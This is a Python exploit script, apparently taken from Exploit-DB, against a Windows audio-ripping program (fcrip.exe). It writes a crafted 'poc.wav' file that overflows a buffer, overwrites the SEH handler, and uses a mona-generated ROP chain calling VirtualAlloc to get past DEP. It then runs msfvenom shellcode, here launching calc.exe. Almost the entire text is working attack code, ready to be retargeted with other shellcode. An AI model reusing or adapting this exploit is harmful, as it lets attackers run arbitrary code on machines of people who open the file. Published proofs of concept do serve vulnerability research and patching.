#!/usr/bin/python # original p0c https://www.exploit-db.com/exploits/36465/ # credit to TUNISIAN CYBER # modified SEH Exploit https://www.exploit-db.com/exploits/36826/ # credit to ThreatActor at CoreRed.com # Software Link: https://www.exploit-db.com/apps/64215b82be8bb2e749f95fec5b51d3e4-FMCRSetup.exe # Tested on: Windows 7 Ultimate X64 # Added DEP Bypass to the exploit # naxxo (head@gmail.com) import struct def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x004103fe,# POP EAX # RETN [fcrip.exe] 0x004e91f4,# ptr to &VirtualAlloc() [IAT fcrip.exe] 0x00418ff8,# MOV EAX,DWORD PTR DS:[EAX] # RETN [fcrip.exe] 0x00446c97,# PUSH EAX # POP ESI # POP EBX # RETN [fcrip.exe] 0x41414141,# Filler (compensate) 0x6f4811f8,# POP EBP # RETN [vorbisfile.dll] 0x1000c5ce,# & push esp # ret[libFLAC.dll] 0x00415bfb,# POP EBX # RETN [fcrip.exe] 0x00000001,# 0x00000001-> ebx 0x00415828,# POP EDX # RETN [fcrip.exe] 0x00001000,# 0x00001000-> edx 0x10005f62,# POP ECX # RETN [libFLAC.dll] 0x00000040,# 0x00000040-> ecx 0x00409967,# POP EDI # RETN [fcrip.exe] 0x00412427,# RETN (ROP NOP) [fcrip.exe] 0x00494277,# POP EAX # RETN [fcrip.exe] 0x90909090,# nop 0x004c8dc0,# PUSHAD # RETN [fcrip.exe] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() # msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\xff\x0a\x0d' shellcode ="" shellcode += "\xbf\xaa\x7e\xf4\xa0\xd9\xec\xd9\x74\x24\xf4\x5a\x33" shellcode += "\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x0f\x03\x7a\xa5\x9c" shellcode += "\x01\x5c\x51\xe2\xea\x9d\xa1\x83\x63\x78\x90\x83\x10" shellcode += "\x08\x82\x33\x52\x5c\x2e\xbf\x36\x75\xa5\xcd\x9e\x7a" shellcode += "\x0e\x7b\xf9\xb5\x8f\xd0\x39\xd7\x13\x2b\x6e\x37\x2a" shellcode += "\xe4\x63\x36\x6b\x19\x89\x6a\x24\x55\x3c\x9b\x41\x23" shellcode += "\xfd\x10\x19\xa5\x85\xc5\xe9\xc4\xa4\x5b\x62\x9f\x66" shellcode += "\x5d\xa7\xab\x2e\x45\xa4\x96\xf9\xfe\x1e\x6c\xf8\xd6" shellcode += "\x6f\x8d\x57\x17\x40\x7c\xa9\x5f\x66\x9f\xdc\xa9\x95" shellcode += "\x22\xe7\x6d\xe4\xf8\x62\x76\x4e\x8a\xd5\x52\x6f\x5f" shellcode += "\x83\x11\x63\x14\xc7\x7e\x67\xab\x04\xf5\x93\x20\xab" shellcode += "\xda\x12\x72\x88\xfe\x7f\x20\xb1\xa7\x25\x87\xce\xb8" shellcode += "\x86\x78\x6b\xb2\x2a\x6c\x06\x99\x20\x73\x94\xa7\x06" shellcode += "\x73\xa6\xa7\x36\x1c\x97\x2c\xd9\x5b\x28\xe7\x9e\x94" shellcode += "\x62\xaa\xb6\x3c\x2b\x3e\x8b\x20\xcc\x94\xcf\x5c\x4f" shellcode += "\x1d\xaf\x9a\x4f\x54\xaa\xe7\xd7\x84\xc6\x78\xb2\xaa" shellcode += "\x75\x78\x97\xc8\x18\xea\x7b\x21\xbf\x8a\x1e\x3d" junk = "A" * 3812 junk+= rop_chain + "\x90" * (308-len(rop_chain)-len(shellcode)) + shellcode seh= "\xd8\x2a\x9d\x63" # 0x639d2ad8 : {pivot 1132 / 0x46c} :# ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN** [vorbis.dll] ** | {PAGE_EXECUTE_READ} buffer = junk + seh + "\x90" * 800 file = "poc.wav" f=open(file,"w") f.write(buffer); f.close();
体验盒子
